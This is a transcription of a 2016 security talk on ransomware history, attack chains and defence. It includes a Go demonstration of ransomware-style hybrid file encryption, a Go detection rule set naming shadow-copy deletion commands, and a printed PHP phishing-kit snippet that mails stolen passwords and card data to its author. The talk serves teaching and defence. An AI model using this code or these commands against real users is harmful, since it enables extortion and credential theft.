IDA-IT-2016-02-09-3 Jacob Herbst
Transcription
Today's threat landscape – Ransomware – how do they do it?
Jacob Herbst, CTO, Dubex A/S
IDA-IT after-work meeting, 9 February 2016

Dubex A/S
• Highly specialised IT security experts – Managing risk, enabling growth
• Sought-after workplace, motivated employees
• Self-financing and privately owned since 1997
• Quality, service, competence, first mover
• Consulting and security services, locally and globally
• Largest IT security partner in Denmark
• 16th best workplace in Denmark, 5th best IT workplace in Denmark

What should we get out of this talk?
• My goals with this talk are to answer the following:
  • What are the trends and tendencies in ransomware attacks?
  • What drives the attacks we are seeing?
  • An insight into some of the methods the attackers use
  • What can we do?
• Disclaimer: Security is a very large subject area that is in constant change. In the next 35 minutes we will at most scratch the surface.

Agenda
• What are the trends and drivers?
• How has ransomware evolved?
• How does a ransomware attack work?
• What is the Dark Web and what can you find there?
• What does the future look like?
• What can we do?

Attacks – current status
Targets and methods:
• Targeted attacks after confidential information
• Industrial espionage
• Attacks that bypass the perimeter defence
• Financially motivated crime
• Theft of credit card information
• Internet fraud
• Extortion – ransomware and DDoS
Attackers: espionage, competitors, terrorism, political actors, criminals, cyber war, insiders
Attacks:
• Attacks against users
• Social engineering attacks, e.g. phishing
• Attacks via social networks
• Web-based attacks
• Indirect attacks aimed at clients
• Indirect attacks via trusted external third parties
• Attacks hidden in encrypted SSL communication
• Vulnerabilities and advanced zero-day attacks
• Rapid exploitation of vulnerabilities
• Exploitation of unknown vulnerabilities – zero-days
• Unique and targeted malware

Drivers behind cyber crime
• Automation
• Collaboration and knowledge sharing
• Anonymity
• Profit
• Payment infrastructure

Advanced attacks have become the norm
• Many targeted attacks are still relatively simple – most so-called advanced attacks still start with an e-mail sent to the right person with the right content
• Cyber crime is a lucrative business, and it is easy to get started
• An underground economy where the criminals trade information
• Methods that were previously only used in targeted attacks are now used by ordinary criminals
• Malware has become more advanced

How Industrial Hackers Monetize the Opportunity (source: RSA/CNBC)
Social Security number: $1
DDoS as a service: ~$7/hour
Credit card data: $0.25–$60
Medical record: >$50
Bank account info: >$1000 (depending on account type and balance)
Mobile malware: $150
Spam: $50 per 500K e-mails
Exploits: $1000–$300K
Malware development: $2500
Facebook account with 15 friends: $1

Malware – development process
Malware is widespread and can be produced so that it bypasses the traditional perimeter defence and other protection.
Obfuscation and quality testing: original malware → permutations → quality testing → rejected if detected by antivirus software → deployment
• Many different variants of the same malware are produced automatically ahead of an attack
• Only the variants that pass the quality testing (i.e. bypass antivirus) are used in the actual attack
• New variants are released at regular intervals to stay ahead of the antivirus signature updates
• 13,750 new malware files per hour

Malware is unique
YOU'RE ABSOLUTELY UNIQUE — JUST LIKE EVERYONE ELSE
• "Consistent with some other recent vendor reports, we found that 70 to 90% (depending on the source and organization) of malware samples are unique to a single organization."
• "There's another lesson here worth stating: Receiving a never-before-seen piece of malware doesn't mean it was an 'advanced' or 'targeted' attack. It's kinda cool to think they handcrafted a highly custom program just for you, but it's just not true. Get over it and get ready for it. Special snowflakes fall on every backyard."
• "A quick look at the types of malware being used shows they are overwhelmingly opportunistic and relatively short-lived. Even though we looked at data over just a six-month period, 95% of the malware types showed up for less than a month, while four out of five didn't last beyond a week."

Ransomware cases

Incidents – Denmark
Human error may be the cause of cyber attacks on municipalities
Attacks like the one that hit Gribskov municipality are most often due to human error, but Denmark may be in the crosshairs right now, an expert believes.
By Mads Allingstrup / 22 Jan 2015, 12:27

Municipalities hit by hacker attack and extortion
By Jens Beck Nielsen and Henrik Jensen, 22 January 2015, 22:30
Several municipalities have now for the first time been attacked by hackers who demand money to withdraw. Intense activity on Gribskov Municipality's drives revealed on Monday afternoon that the municipality had been hit by a cyber attack for the first time. Hackers had encrypted files in the municipality's systems and demanded money to release their hold on them. The municipality refused to pay and reported the matter to the police, who yesterday passed it on to Europol.
So far there is nothing to indicate that sensitive information about citizens has leaked, but municipal director Holger Spangsberg Kristiansen stresses that the attack is being taken "very, very seriously". Two municipalities have been hit, but there are most likely more that are not yet known, explains Mads Nørgaard Madsen, security expert and partner at the audit firm PwC, who has been in contact with the affected municipalities. According to Mads Nørgaard Madsen the hackers are firing a shotgun and encrypting arbitrary files, so in his view these are not targeted attempts to steal, for example, personal data. "This is about causing as much havoc as possible, so that as much money as possible can be demanded. In this case the hackers made contact via e-mail, and some users ended up downloading an infected file. So it is also about raising awareness of security. Without pointing fingers, that might have countered these attacks," says Mads Nørgaard Madsen.
Source: http://www.b.dk/nationalt/kommuner-udsat-for-hackerangreb-og-afpresning

While Gribskov, Nordfyn and perhaps even more municipalities are right now struggling to free themselves from a vile attack on their IT systems, there are probably one or more employees in those municipalities walking around with red ears. Ransomware attacks are most often due to human error, where people end up downloading a file they should not have downloaded, or click on a link or an attachment in an e-mail that turns out to be infected. That is the assessment of Shehzad Ahmad, director of the security organisation DK-CERT, who as recently as last week was behind a report on Danes' IT security in which ransomware was specifically named as a growing problem.
Often attachments: "One cannot rule out that this is a targeted attack, but what we normally see is that it is a person who starts the process themselves. It could be a person in an accounting department who has clicked on a statement sent to them, or a person who has clicked on a link in an e-mail." Ransomware is one of the most vile types of attack, because the malicious code actively tries to "hijack" the user's computer and demands a ransom to release it again. The more advanced types of ransomware even encrypt the user's files, or particular file types such as Excel sheets, with very strong encryption that cannot easily be broken. The perpetrators then demand a ransom to unlock the computer, but even if you pay, it is far from certain that they actually keep their promise and send the key so that you can get your files back.
Source: http://www.dr.dk/nyheder/viden/tech/menneskelig-fejl-kan-vaere-aarsag-til-cyberangreb-mod-kommuner

Malicious mail virus attacks Danish companies
Monday 28 September 2015, 12:20 / Thomas Breinstrup
PostDanmark has reported to the police a virus that pretends to come from the postal service but locks people's files and demands a ransom. A particularly malicious computer virus that claims to come from the postal service is spreading in Denmark and encodes files so that you no longer have access to them. PostDanmark is warning on its front page against the fake message that many Danes have received and which carries a dangerous virus.

Cases in the media
Ransomware – lack of patching led to ransomware
• Three months after the hacker attack there are still after-effects of the digital break-in, and extra work in the bookkeeping department.
• The ransom was around DKK 3,000, which was low enough, but the communication with the hackers dragged on. In the end they pulled the plug on the entire old IT setup instead.
• Now it is therefore also about preparing for new threats.
• "You don't think it will happen to you. But don't believe it won't happen to you. It is no longer a question of who gets hacked, but when you get hacked."

Cases in the media – targeted
Abroad…
"Between April 2014 and June 2015, the IC3 received 992 CryptoWall-related complaints, with victims reporting losses totaling over $18 million." – FBI Security Bulletin, June 2015

Ransomware Evolution
• Clearly, ransomware attacks have increased in numbers over the last 5 years
• Many security reports talk about the sophistication and complexity of individual attacks
• The general public is left with the impression that we are faced with a new threat that is very difficult or impossible to prevent

The evolution of ransomware – a bit of history

Cyber extortion
• Cyber extortion is online crime that involves an attack, or a threat of attack, against a person or company, combined with a demand for payment to stop the attack
• Cyber extortion can take several forms: encrypting data and holding it hostage, stealing data and threatening to expose it, denying access to data, attacking systems so that they become unavailable
Forms of cyber extortion:
• Ransomware: encryption ransomware, locker ransomware
• DDoS: volumetric (flooding), computational asymmetric (consuming CPU cycles), stateful asymmetric (abusing memory), vulnerability-based (exploiting software vulnerabilities), blended DDoS (combination of multiple attack vectors)
• Blackmail: release of information

Ransomware History – AIDS
• The first known ransomware was the 1989 "AIDS" trojan (also known as "PC Cyborg") written by Joseph Popp.
• PC CYBORG (AIDS Disk)
• Emerged in 1989.
• Distributed on floppy disks
• Installed from trojan software
• Lay dormant to allow time for propagation
• Used basic encryption and operating system quirks to "scramble" and hide files
• Demanded a "license payment" to be sent by cheque to a post office box in Panama
• Not very successful – the technology was lagging behind the idea

Ransomware History – 1990s–2000s
• Malware continued to develop through the 1990s and 2000s: identity theft, phishing scams and password stealing, botnets (networks of compromised PCs), adware
• Ransomware in the 1990s–2000s was a very small percentage of malware:
  • Too complicated – how to get the money?
  • Too risky – how to stay hidden?
  • Too weak – how to "deny service" on a PC you do not control?
• Occasional "fake" ransom or fake antivirus, easily defeated / removed
• Occasional "locker" that affected the boot process, easily defeated / removed
• 2005: PGPCoder trojan – 1024-bit RSA key, collects money via E-Gold
(Images: (CC) BitDefender España (2010), https://www.flickr.com/photos/bitdefenderes/4292753852; screenshot from http://www.acma.gov.au/~/media/mediacomms/Social%20Media/Images/Ransomware%20Screenshot%20jpg.jpg)

Ransomware History – 1990s–2000s (continued)
• The ransomware concept dates back to 1989
• In 2010, something changed…
• In 2012, something changed, a lot!
• Technology has caught up with the idea!
• Step 1: Idea! Ransom money from people!
• Step 2: Use technology to enable the idea!
• Step 3: Profit…

CTB-Locker stands for "Curve-Tor-Bitcoin", a reference to its core technologies:
• Curve – strong encryption, i.e. elliptic curve cryptography, an extremely strong form of encryption based on number theory
• Tor – anonymity, i.e. The Onion Router network, an anonymised part of the Internet (the "dark Internet")
• Bitcoin – untraceable crypto-cash payments, the virtual currency extorted from the victims of the ransomware (invented in 2009 by Satoshi Nakamoto)

Google search trends: "ransomware" searches, 2008 to 2015 (chart)

Malware types 2005–2015 (chart): percentage of new families of misleading apps, fake AV, locker ransomware and crypto ransomware identified between 2005 and 2015. Source: Symantec, The evolution of ransomware, August 2015

Reveton – Locker
• In 2012 the ransomware trojan known as Reveton began to spread
• It is also known as the "police trojan"
• Its payload displays a warning purporting to come from a law enforcement agency
• It claims that the computer has been used for illegal activities, such as downloading pirated software, promoting terrorism, copyright infringement etc.
• The warning informs the user that to unlock their system they have to pay a fine
• To reinforce the illusion that the computer is being tracked by law enforcement, the screen also displays the computer's IP address and footage from the computer's webcam

Lockers (screenshots)

What is crypto ransomware?
• Crypto ransomware takes your data hostage
• Crypto ransomware encrypts your data and offers to sell you the key for decryption
• Until about a year ago most crypto ransomware attacks were fairly harmless, since the encryption used could easily be removed
• With Cryptolocker, TorrentLocker, CTB-Locker and the like, this has changed…

Infection chain: infection → the malware downloads the crypto malware → data is encrypted → message demanding payment of a ransom before a deadline → payment of the ransom in bitcoins via Tor

Evolution (examples)

Evolution of GPCode's encryption
• GPCode (2004): used a one-byte encryption key, easily defeated; electronic payments
• GPCode.ac (June 2005): implemented RSA public-key cryptography, but with a very weak key (56-bit RSA modulus, roughly a 7-bit symmetric key)
• GPCode.ad (April 2006): longer RSA keys but still a poor implementation
• GPCode.ag (June 2006): finally a strong RSA key (660 bit, roughly a 60-bit symmetric key); cracked by Kaspersky, probably thanks to a coding error in .ag
• GPCode.ak (June 2008): properly implemented 1024-bit RSA key; still failed because of the "cipher" chosen for the files, RC4, which was vulnerable to cryptanalysis
• GPCode.ax (December 2010), a copycat: unbreakable encryption… but it can still be stopped (it has flaws)

Evolution of command and control
• GPCode (2004): no C&C (C2) server, it just "did its thing"; the victim contacts the malware producer by e-mail for the unlock code
• Reveton (2012): doesn't encrypt, but uses a C2 server for the "unlock"
• Cryptolocker (2013): uses a C2 server to retrieve the RSA public key (much more secure for the attacker); a pseudo-random domain generation algorithm (DGA) to avoid easy takedowns (it contacts garbage domains such as xxgrradvvzcfyx.biz)
• Cryptowall (2014): uses a C2 server on Tor, a hidden and anonymous network; improved DGA to make takedown even harder

Ransomware 2013/2014
September 2013 – CryptoLocker: the first versions appear to have been posted in September 2013
• Usually enters the company by e-mail.
• If a user clicks on the executable, it immediately starts scanning network drives, renames all the files and folders and encrypts them.
December 2013 – Locker: the first copycat emerged in December 2013
• $150 to get the key, with the money sent to a Perfect Money or QIWI Visa Virtual Card number.
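The step that separates the later families from the early GPCode versions, retrieving the operator's RSA public key from the C2 server and using it to wrap a per-file key, is worth seeing concretely. The following Go program is an added example written for this transcription, not code from the talk or from any of the families named; it models the hybrid scheme (one random AES-256-GCM key per file, that key wrapped with the operator's RSA-OAEP public key) using only the Go standard library, and shows why a captured sample, which carries only the public key, does not let a victim or a defender unwrap the file keys. Names such as OperatorKeyPair and EncryptedFile and the sample document text are this example's own.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"errors"
	"fmt"
)

// EncryptedFile is what a CryptoLocker-style sample leaves behind for one
// file: the per-file key wrapped with the operator's RSA public key, the
// GCM nonce, and the ciphertext. The layout is this example's own.
type EncryptedFile struct {
	WrappedKey []byte // RSA-OAEP(operatorPub, fileKey)
	Nonce      []byte
	Ciphertext []byte
}

// OperatorKeyPair models the key pair that exists only on the C2 server.
// The sample on the victim's machine only ever sees the public half.
func OperatorKeyPair(bits int) (*rsa.PrivateKey, error) {
	return rsa.GenerateKey(rand.Reader, bits)
}

// EncryptFile is the victim-side step: a fresh 256-bit key per file, the
// data sealed with AES-256-GCM, and the key wrapped with the public key.
// Only the wrapped copy is kept; the raw key is zeroed before returning.
func EncryptFile(pub *rsa.PublicKey, plaintext []byte) (*EncryptedFile, error) {
	fileKey := make([]byte, 32)
	if _, err := rand.Read(fileKey); err != nil {
		return nil, err
	}
	defer func() {
		for i := range fileKey {
			fileKey[i] = 0
		}
	}()
	block, err := aes.NewCipher(fileKey)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, fileKey, nil)
	if err != nil {
		return nil, err
	}
	return &EncryptedFile{
		WrappedKey: wrapped,
		Nonce:      nonce,
		Ciphertext: gcm.Seal(nil, nonce, plaintext, nil),
	}, nil
}

// DecryptFile is the step the victim pays for: without the operator's
// private key the wrapped file key is opaque and AES never gets its key.
func DecryptFile(priv *rsa.PrivateKey, ef *EncryptedFile) ([]byte, error) {
	fileKey, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, ef.WrappedKey, nil)
	if err != nil {
		return nil, errors.New("cannot unwrap file key: wrong or missing private key")
	}
	block, err := aes.NewCipher(fileKey)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, ef.Nonce, ef.Ciphertext, nil)
}

func main() {
	operator, _ := OperatorKeyPair(2048) // lives on the C2 server only
	doc := []byte("constructed sample document: Q4 figures")
	ef, _ := EncryptFile(&operator.PublicKey, doc)
	fmt.Printf("wrapped key %d bytes, ciphertext %d bytes\n", len(ef.WrappedKey), len(ef.Ciphertext))

	// A defender holding the sample (public key) and the encrypted files
	// cannot recover them; any other key pair fails at the unwrap step.
	stranger, _ := OperatorKeyPair(2048)
	if _, err := DecryptFile(stranger, ef); err != nil {
		fmt.Println("without operator key:", err)
	}
	got, _ := DecryptFile(operator, ef)
	fmt.Println("with operator key, plaintext recovered:", bytes.Equal(got, doc))
}
```

The weak links in the GPCode lineage map onto this structure: a short RSA modulus lets the wrapped key be factored out, and a flawed file cipher (RC4 misuse) lets the ciphertext be attacked without the key at all. With a properly sized modulus and an authenticated cipher, the only recovery paths left are backups, the operator's private key, or an implementation mistake in the sample.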
December 2013 – CryptoLocker 2.0: a new and improved version of CryptoLocker was found in December 2013
• CryptoLocker 2.0 was written in C#, while the original was in C++.
• Tor and Bitcoin are used for anonymity, and 2048-bit encryption.
• At the time, the latest variant was not detected by antivirus or firewalls.
April 2014 – CryptoWall: rebranded from CryptoDefense in April 2014
• Exploited a Java vulnerability.
• Malicious advertisements on domains belonging to Disney, Facebook, The Guardian newspaper and many others led people to sites that infected them with CryptoWall and encrypted their drives.
• According to an August 27 report from the Dell SecureWorks Counter Threat Unit (CTU): "CTU researchers consider CryptoWall to be the largest and most destructive ransomware threat on the Internet as of this publication, and they expect this threat to continue growing."
• More than 600,000 systems were infected between mid-March and August 24, with 5.25 billion files being encrypted. 1,683 victims (0.27%) paid a total of $1,101,900 in ransom. Nearly 2/3 paid $500, but the amounts ranged from $200 to $10,000.
December 2013 – CryptorBit: a new ransomware discovered in December 2013
• CryptorBit corrupts the first 1024 bytes of any data file it finds.
• Can bypass Group Policy settings put in place to defend against this type of ransomware infection.
• Social engineering is used to get end users to install the ransomware, with lures such as a fake Flash update or a rogue antivirus product.
• Tor and Bitcoin again used for the ransom payment.
• Also installs crypto-coin mining software that uses the victim's computer to mine digital currency.
July 2014 – Cryptoblocker: a new ransomware variant emerged in July 2014
• Only encrypts files smaller than 100 MB and skips anything in Windows or Program Files.
• It uses AES rather than RSA encryption.
August 2014 – SynoLocker: appeared in August 2014
• This one attacked Synology NAS devices. SynoLocker encrypted files one by one.
• Payment was in bitcoins and again Tor was used for anonymity.
Midsummer 2014 – CTB-Locker (Curve-Tor-Bitcoin Locker): discovered midsummer 2014
• The first infections were mainly in Russia. The developers were thought to be from an eastern European country.

Ransomware 2014/2015
December 2014 – OphionLocker: surprise! Another ransomware released during the holidays, December 2014
• ECC (elliptic curve cryptography) public-key encryption.
• 3 days to pay the ransom or the private key will be deleted.
January 2015 – Pclock: greets the New Year, January 2015, by mimicking CryptoLocker
• Files in the user's profile are encrypted.
• Volume shadow copies are deleted and disabled.
• 72-hour countdown timer to pay 1 bitcoin in ransom.
January 2015 – CryptoWall 2.0: ransomware goes on steroids in January 2015
• Delivered via e-mail attachments, malicious PDF files and various exploit kits.
• Encrypts the user's data until a ransom is paid for the decryption key.
• Uses Tor to obfuscate the C&C (command & control) channel.
• Incorporates anti-VM and anti-emulation checks to hamper identification via sandboxes.
• Has the ability to run 64-bit code directly from its 32-bit dropper: it can switch the processor execution context from 32-bit to 64-bit.
February 2015 – TeslaCrypt: a new family, styled after CryptoWall, surfaced in February 2015
• Targets popular video game files such as Call of Duty, Minecraft, World of Warcraft and Steam.
February 2015 – VaultCrypt: pretended to be customer support in February 2015
• First circulated in Russia.
• Uses Windows batch files and the open-source GnuPG software for file encryption.
March 2015 – CryptoWall 3.0: a new version appeared in March 2015
• I2P network communication.
• Uses exploit kits to gain privilege escalation on the system.
• Disables many security features on a target system.
October 2015 – LowLevel04: this file-encrypting ransomware greeted us in October 2015
• Also known as the Onion TrojanRansom
• Spreads via brute-force attacks on machines with Remote Desktop or Terminal Services exposed
• Encrypts files using AES, but the encryption key itself is RSA-encrypted
November 2015 – Chimera
• The attackers threaten to publish the encrypted files on the Internet if the victim doesn't pay!
September 2015 – CryptoWall 4.0: 6 months later, in September 2015, a new variant is on the loose
• The most important change from CryptoWall 3.0 to 4.0 is that it also encrypts the filenames of the encrypted files, making it more difficult to work out which files need to be recovered (filename scrambling)
• Obliterates restore points
• Improved network security evasion

Ransomware attacks – typical course of a ransomware attack
• Phishing attack: a number of users receive a phishing mail
• Attack: a user opens the attached file or follows the link; the user's machine is infected with malware
• Malware download and contact: the crypto ransomware is downloaded; the malware contacts the command & control server
• Key exchange: the public/private key pair used for the encryption is exchanged
• Encryption of data: the files on the affected computer are encrypted
• Display of the extortion message: the victim is shown a message with a deadline and a ransom amount
• (Payment): the victim pays the ransom via the Tor network in bitcoins
• (Unlocking of files): the victim receives the key for decrypting the data

Cryptolocker
• Widely known variant of ransomware
• Distributed either as an attachment to a malicious e-mail, or propagated using the Gameover ZeuS botnet
• Began September 2013 / rose to prominence in late 2013
• Encrypts certain types of files stored on local drives using RSA public-key cryptography (each file is encrypted with a symmetric key that is in turn encrypted with the RSA public key)
• The private key is stored only on the malware's control servers, and it is impossible to recover the files without it
• Offers to decrypt the data if a $300 ransom is paid by a stated deadline. The ransom increases after the deadline.
• Threatens to delete the private key if the deadline passes.
• The goal is monetary, via Bitcoin
• Dell SecureWorks estimates that CryptoLocker infected 250,000 victims; at an average payout of $300 each, that is on the order of $1 million a day
• $27 million in ransom in the first 2 months (FBI)
• Defeated in early June 2014 when the Gameover botnet was knocked out in a joint effort by various government agencies and security firms
• Decryption keys were made available to victims at www.decryptcryptolocker.com

Filename extensions encrypted by CryptoLocker:
.3fr .7z* .ai* .apk .arw .avi .bar .bay .bc6 .bc7 .big .bik .bkf .bkp .bsa .cas .cdr .cer .cfr .cr2 .crt .crw .css .csv .das .db .db* .dcr .der .dmp .dng .doc .docx .dwg .dxg .epk .eps .erf .esm .ff .ff* .flv .fos .fpk .fsh .gdb .gho .hkx .itl .itm .iwd .iwi .jpe .jpg .js .js* .kdb .kdc .kf .kf* .lbf .lrf .ltx .lvl .m2 .m2* .m3u .m4a .map .mdb .mdf .mef .mlx .mov .mp4 .ncf .nrw .ntl .odb .odc .odm .odp .ods .odt .orf .p12 .p7b .p7c .pak .pdd .pdf .pef .pem .pfx .png .ppt .pptx .psd .psk .pst .ptx .py .py* .qdf .qic .r3d .raf .rar .raw .rb .rb* .re4 .rim .rtf .rw2 .rwl .sav .sb .sb* .sid .sie .sis .slm .snx .sql .sr2 .srf .srw .sum .svg .t12 .t13 .tax .tor .txt .upk .vcf .vdf .vpk .vtf .w3x .wb2 .wma .wmo .wmv .wpd .wps .x3f .xf .xf8 .xlk .xls .xlsx .xxx .zip

TeslaCrypt (screenshot)

Who pays the ransom?
• A police department paid to decrypt images and Word documents
• In Australia, a Townsville sex shop paid $1,058 to ransomware attackers
• FBI's advice on ransomware? Just pay the ransom.
"The ransomware is that good." "To be honest, we often advise people just to pay the ransom." "The easiest thing may be to just pay the ransom." "The amount of money made by these criminals is enormous and that's because the overwhelming majority of institutions just pay the ransom." "Most ransomware scammers are good to their word. You do get your access back."
– Joseph Bonavolonta, Assistant Special Agent in Charge of the FBI's Cyber and Counterintelligence Program, Boston
https://securityledger.com/2015/10/fbis-advice-on-cryptolocker-just-pay-the-ransom/

How many pay?
• "It is surprising that approx. 9.7% of the respondents claim to have been victims of some sort of ransomware. This figure is at least twice as high as the one we were expecting, judging from the scarce and quite speculative previous literature. Most of the ransomware victims seemed to have chosen not to pay the ransom, but a very high percentage of them indeed complied and sent the money to the cyber criminals. This percentage seems to be around 41% for CryptoLocker and approx. 30% for other strands of ransomware (Icepol/Reveton, and many others). This is at least 10 times more than the last previous estimation by Symantec of around a 3% of paying victims (a previous one by the Dell SecureWorks CTU research team put this figure at 0.4%)."
• Data from a January 2014 survey by the University of Kent: http://www.cybersec.kent.ac.uk/Survey2.pdf

Cryptolocker mastermind
• According to the FBI, losses are "more than $100 million."
• Bogachev is identified as a leader of a gang of cyber criminals based in Russia and Ukraine that is responsible for both GameOver Zeus and Cryptolocker.
• Evgeniy Mikhailovich Bogachev
• Age 30
• Anapa, Russia
• Nickname "Slavik"
• Indicted for conspiracy, computer hacking, wire fraud, bank fraud and money laundering
(Image source: FBI)

An attack…

Dubex Security Analytics Center
• Monitoring of log files and alarms from, among others:
  • Firewalls
  • IDS/IPS systems
  • Web scanning
  • Servers (Windows, Unix, databases, web servers, Active Directory etc.)
• Some statistics from 2015:
  • Processing of "direct" data from more than 10,000 devices, and indirectly from many more via logs from firewalls, IDS/IPS etc.
  • Collection and analysis of more than 12 trillion (12 billioner) log lines / events
  • Manual review of more than 3.5 million correlated alarms
  • More than 500 qualified alarms sent out to our customers
Typical observations:
• Internal systems with malware / trojan horses
• Phishing attacks
• Ransomware
• Attacks against web servers – vulnerabilities, SQL injection, ransomware and defacement
• Brute-force password cracking
• Scanning for SIP services
• Suspicious traffic
• Unauthorised traffic
• Other – scans

Current ransomware – example of a phishing mail
• The end user receives a phishing mail with a link to a fake website
• The site is "protected" with a CAPTCHA, presumably to hinder automated analysis
File download
• The end user then automatically downloads a ZIP file named "forsendelse_20310.zip"
• The file actually contains an EXE file that has been given a PDF icon so it looks like a PDF file
Sandbox analysis
• The sandbox is a monitored copy of our client environment in which malware can be run and observed without causing damage to the real systems
• The sandbox is used for dynamic malware analysis and behaviour-based detection
Analysis of the malicious file – observed behaviour:
• Change of mail settings
• Autorun entry added, and the file obfuscated
• Copy of itself into the %windir% directory
• Unique, previously unknown file
• Deletion of shadow copies
• Access to a "malware" domain
• Establishment of a backdoor
• Lookups against its own DNS server
• The virus only slowly becomes known to the antivirus software
Another slightly newer variant – also unique…
Encrypted files (screenshot)
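The sandbox observations above (an executable delivered as a "PDF", an autorun entry, a copy of itself under %windir%, deletion of shadow copies, lookups against the attacker's own DNS server) are exactly the events a monitoring setup like the one described can alert on. The following Go program is an added example written for this transcription, not a Dubex detection rule; it runs a handful of rules over constructed endpoint events in a tab-separated format assumed here (PROC, FILE, REG and DNS records) and returns which rule fired on which line. The sample trace, the approved resolver addresses and the file names in it are constructed for the example.

```go
package main

import (
	"fmt"
	"strings"
)

// Alert is one finding: the rule that fired and the event line that triggered it.
type Alert struct {
	Rule string
	Line string
}

// Resolvers the organisation actually uses (constructed); a query sent
// anywhere else is the "lookup against its own DNS server" behaviour.
var approvedResolvers = map[string]bool{"10.0.0.53": true, "10.0.1.53": true}

// Event format assumed for this example, one tab-separated record per line:
//   <time>  PROC  <image path>    <command line>
//   <time>  FILE  <path written>  <writing process image>
//   <time>  REG   <registry key>  <value data>
//   <time>  DNS   <queried name>  <resolver ip>
func parse(line string) (kind, a, b string, ok bool) {
	f := strings.Split(line, "\t")
	if len(f) != 4 {
		return "", "", "", false
	}
	return f[1], f[2], f[3], true
}

// droppedIn reports whether a lower-cased image path sits in a
// user-writable drop location that mail-delivered malware runs from.
func droppedIn(lowerPath string) bool {
	return strings.Contains(lowerPath, `\downloads\`) ||
		strings.Contains(lowerPath, `\appdata\local\temp\`)
}

// Analyze applies the rules to each event and returns the alerts in order.
func Analyze(lines []string) []Alert {
	var alerts []Alert
	for _, line := range lines {
		kind, a, b, ok := parse(line)
		if !ok {
			continue
		}
		al, bl := strings.ToLower(a), strings.ToLower(b)
		switch kind {
		case "PROC":
			// Shadow-copy deletion is the most ransomware-specific action here.
			if (strings.Contains(bl, "vssadmin") && strings.Contains(bl, "delete shadows")) ||
				(strings.Contains(bl, "wmic") && strings.Contains(bl, "shadowcopy delete")) {
				alerts = append(alerts, Alert{"shadow-copy-deletion", line})
			}
			// An EXE started from Downloads/Temp, or dressed up as a document
			// with a double extension, is the opened "PDF" from the phishing mail.
			doubleExt := strings.Contains(al, ".pdf.exe") || strings.Contains(al, ".doc.exe")
			if strings.HasSuffix(al, ".exe") && (droppedIn(al) || doubleExt) {
				alerts = append(alerts, Alert{"exec-from-drop-location", line})
			}
		case "FILE":
			// A process from a drop location writing an executable into the
			// Windows directory is the "copy to %windir%" step.
			if strings.Contains(al, `\windows\`) && strings.HasSuffix(al, ".exe") && droppedIn(bl) {
				alerts = append(alerts, Alert{"self-copy-to-windir", line})
			}
		case "REG":
			// Any write under a Run key is persistence across reboots.
			if strings.Contains(al, `\currentversion\run`) {
				alerts = append(alerts, Alert{"autorun-persistence", line})
			}
		case "DNS":
			if !approvedResolvers[b] {
				alerts = append(alerts, Alert{"unapproved-resolver", line})
			}
		}
	}
	return alerts
}

// Rules lists just the rule names, in firing order.
func Rules(alerts []Alert) []string {
	names := make([]string, 0, len(alerts))
	for _, a := range alerts {
		names = append(names, a.Rule)
	}
	return names
}

// SampleEvents is a constructed trace of the phishing case described above.
func SampleEvents() []string {
	return []string{
		"2016-02-09T10:14:55Z\tPROC\tC:\\Windows\\explorer.exe\texplorer.exe",
		"2016-02-09T10:15:01Z\tPROC\tC:\\Users\\alice\\Downloads\\forsendelse_20310.pdf.exe\t\"forsendelse_20310.pdf.exe\"",
		"2016-02-09T10:15:02Z\tFILE\tC:\\Windows\\svchost32.exe\tC:\\Users\\alice\\Downloads\\forsendelse_20310.pdf.exe",
		"2016-02-09T10:15:02Z\tREG\tHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\upd\tC:\\Windows\\svchost32.exe",
		"2016-02-09T10:15:03Z\tPROC\tC:\\Windows\\System32\\vssadmin.exe\tvssadmin.exe Delete Shadows /All /Quiet",
		"2016-02-09T10:15:04Z\tDNS\tupdate.example-c2.invalid\t198.51.100.7",
		"2016-02-09T10:15:05Z\tDNS\tmail.corp.example\t10.0.0.53",
		"2016-02-09T10:15:06Z\tPROC\tC:\\Windows\\System32\\cmd.exe\tcmd.exe /c dir",
	}
}

func main() {
	for _, a := range Analyze(SampleEvents()) {
		fmt.Printf("%-24s %s\n", a.Rule, a.Line)
	}
}
```

The individual rules are deliberately simple string checks; what makes them useful is the sequence: the same sample, within seconds, executes from a drop location, copies itself into the Windows directory, persists via a Run key, deletes shadow copies and resolves a name through a resolver the organisation does not use. A correlation of those findings on one host is a far stronger alarm than any one of them, which is also why the sandbox observations were listed together rather than as isolated signatures.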
Payment instructions – with help on bitcoins via YouTube (screenshot)
The Bitcoin address is unique

Tor – a combination of several "mixes"
• Goal: establish an infrastructure that is not vulnerable to traffic analysis
• Concept: a combination of mixes and proxies
• Uses public-key cryptography to establish connections
• Uses symmetric keys for the communication
• The same concept as known from SSL/TLS proxies
• Uses several mixes to ensure a diverse network
• Mixes:
  • Receive encrypted input from different senders
  • Decrypt and forward in random order
  • An observer cannot see which output corresponds to which input
  • As long as a single server in the chain works correctly and is not compromised, anonymity is preserved
  • Drawback: expensive and slow public-key encryption
(Diagram: messages from senders A, B and C entering a chain of mixes and leaving in shuffled order – impossible to determine which message comes from which sender)

How do you get onto the Tor network? (screenshot)

What is the Dark Web used for? (2015) – top 5
• Guns, bullets and weapons ("Booom?")
• Drugs
• Forged documents ("Need a driver's licence?")
• Stepping stones and rooted servers: RDP, VNC, NX, you name it – remote desktop access
• Bots and botnets: a Zeus botnet for only $7.56; access via proxies, SOCKS, and to loaders and phishing…

The dark forums – hacking the hackers
• Inside many of the folders were files like "css.gif" … and it was not an image!
• Behind the code – hackers hacking hackers: the captured password and card details are mailed to the address hard-coded in $zaz, i.e. to the kit's author, not only to whoever deployed the kit:

    $zaz = 'reszult@yahoo.com';
    …
    PSW : $theAccountPW
    …
    CardHolder : $chold
    CardNumber : $cnum
    ExpiryDate : $exp
    CVC : $cvv
    $subject = "RZ # $date # $time";
    $headers = "From: VbV Full Info<EMAIL-REMOVED@yahoo.fr>";
    $headers .= $_POST['eMailAdd']."\n";
    mail($zaz,$subject,$log,$headers);

Dropping files (screenshot)
Virus maker kits for free (backdoored)

